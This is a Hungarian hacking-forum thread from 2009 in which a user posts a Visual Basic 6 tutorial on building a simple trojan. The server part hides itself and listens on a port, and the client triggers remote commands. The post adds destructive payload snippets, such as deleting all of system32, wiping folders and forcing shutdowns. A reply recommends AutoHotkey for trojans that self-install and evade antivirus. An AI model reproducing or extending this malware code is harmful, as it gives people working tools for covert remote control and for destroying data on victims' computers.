sOnt Posted Január 14, 2009 Share Posted Január 14, 2009 Hali. Nem tudom, hogy érdekel-e esetleg valakit, de azért postolok nektek egy Visual Basic 6 tutorialt, amiben megmutatom hogyan kell elkészíteni egy trójai program alapját. Igazából nem bonyolult. A Kliens A program kliens részében lesz egy gomb amivel fel fogsz kapcsolódni a szerverre, és lesz 2 másik gomb amivel utasítod a szervert, hogy tegyen meg valamit. Private Sub Command1_Click() Winsock1.RemoteHost = Text1.Text Winsock1.RemotePort = 1234 Winsock1.Connect End Sub Private Sub Command2_Click() Winsock1.SendData "2" End Sub Private Sub Command3_Click() Winsock1.SendData "3" End Sub Private Sub Winsock1_Connect() Form1.Caption = "Kapcsolódva ---> " & Text1.Text End Sub Ha ezt bemásoltuk, utána be kell rakni egy Winsock nevű komponenst a project-be. Ezt úgy tudjuk elérni, hogy lenyomjuk a CTRL+T bill. kombinációt és kiválasztjuk a Microsoft Winsock Control 6.0-t, utána Apply és Close. Aztán a baloldali sávban láthattok egy ikont ami 2 számítógépet ábrázol. Kattintsatok rá bal egérgombal egyszer és a Form-ban rajzoljatok egy kis négyzetet az egérrel. A Szerver Ide is be kell raknunk a Winsock-ot, ugyan úgy mint a kliensnél. Ha ez megvan, akkor ezt a kódot másoljátok be: Private Sub Form_Load() App.TaskVisible = False Me.Hide If App.PrevInstance = True Then Unload Me End If Winsock1.LocalPort = 1234 Winsock1.Listen End Sub Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long) If Winsock1.State <> sckClosed Then Winsock1.Close Winsock1.Accept requestID End Sub Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long) Dim data As String Winsock1.GetData data If data = "2" Then On Error Resume Next Shell ("C:\WINDOWS\system32\cmd.exe") End If If data = "3" Then On Error Resume Next Shell ("C:\WINDOWS\system32\notepad.exe") End If End Sub Most elmentheted mind a két projectet és készíthetsz belőlük egy server.exe-t és egy client.exe-t. Itt van pár kód ami segíthet felturbózni a trójaidat: Megnyitni egy weblapot Shell "Explorer.exe http://sont16.extra.hu" Törölni egy fájlt Kill "C:\WINDOWS\system32\cmd.exe Törölni egy mappát RmDir "D:\mappa" Törölni minden állományt egy mappában Kill "C:\WINDOWS\system32\*.* Létrehozni egy könyvtárat MkDir "C:\WINDOWS\sOnt Törölni minden mp3 fájlt egy mappában Kill "D:\Zene\*.mp3 PopUp üzenet MsgBox "Köszönjük, hogy minket választott!!" Kikapcsolni a számítógépet Shell "shutdown -s" Kijelentkeztetni a számítógépet Shell "shutdown -l" Kinyitni a CD meghajtó tálcáját Modul Public Sub OpenCDDrive() 'Call me to open the CD Drive mciSendString "Set CDAudio Door Open Wait", vbNullString, 0, 0 End Sub Form Call Module1.OpenCDDrive By: sOnt a PirateClub.hu számára - Ha ezt a tutorialt be szeretnéd másolni egy másik oldalra akkor nyugodtan megteheted, de ez a sor is legyen benne a postban. Ennyit megtehetsz szerintem. Köszi. Remélem tudtam segíteni valamiben. Ha esetleg lesz rá igény akkor postolok még hasonlókat. Kezdőknek nem igazán tervezek tutorialokat csinálni, mert rengeteg videó van például YouTube.com-on is. Idézés Link to comment Share on other sites More sharing options...
szilveszter Posted Október 2, 2009 Share Posted Október 2, 2009 (edited) Ha ilyen szitű trójaiakat akar csinálni az ember, ajánlom inkább az autohotkey scriptnyelvet, tömör egyszerű, c-ben fordított script nyelv. Az itt írt scripteket konvertálhatod exébe, ami akár a másik gépen is fel tudja magát telpíteni, de bárhol le is fut, pl egy cdrom nyitogató script 3 sor , de akkor már be sem tudja szegény csukni. Hasznos benne a dll call, és hogy nem detektálja semmilyen vírusvédelem. Egér irányítás pofonegyszerű, billentyűk szintén, teljes ref a honlapon ja és 5000 res példatár is. Az eddig általam látott legjobb és leghasznosabb script nyelv. http://www.autohotkey.com Módosította November 7, 2009 Dadus Közvetlen link miatt szerkesztve /Szabályzat/ Idézés Link to comment Share on other sites More sharing options...
Recommended Posts